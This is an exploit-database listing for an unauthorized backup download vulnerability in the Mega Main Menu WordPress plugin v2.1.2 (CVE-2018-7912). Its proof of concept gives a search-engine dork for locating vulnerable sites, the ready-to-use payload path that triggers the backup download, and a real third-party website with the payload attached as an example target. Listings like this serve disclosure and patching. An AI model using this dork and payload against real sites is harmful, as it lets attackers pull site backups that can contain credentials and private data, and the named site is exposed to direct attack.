WordPress Menu Plugin - Mega Main Menu v2.1.2 unauthorized backup download Vulnerability
CVE
Category
Price
Severity
CVE-2018-7912
CWE-284
$500
High
Author
Risk
Exploitation Type
Date
Exploit Alert Team
High
Remote
2019-03-19
CPE
cpe:cpe:/a:wp_mega_menu_project:wp_mega_main_menu_plugin:2.1.2
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030155 WordPress Menu Plugin - Mega Main Menu v2.1.2 unauthorized backup download Vulnerability ====================================================================================================================================
| # Title : WordPress Menu Plugin - Mega Main Menu v2.1.2 unauthorized backup download Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 65.0.2(32-bit) |
| # Vendor : https://codecanyon.net/item/mega-main-menu-wordpress-menu-plugin/6135125 |
| # Dork : "/wp-content/plugins/mega_main_menu/" |
====================================================================================================================================
poc :
[+] Dorking n Google Or Other Search Enggine.
[+] Use payload : /wp-admin/?mmm_page=backup_file
[+] https://www.lazarola.com/testeo/wp-admin/?mmm_page=backup_file
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum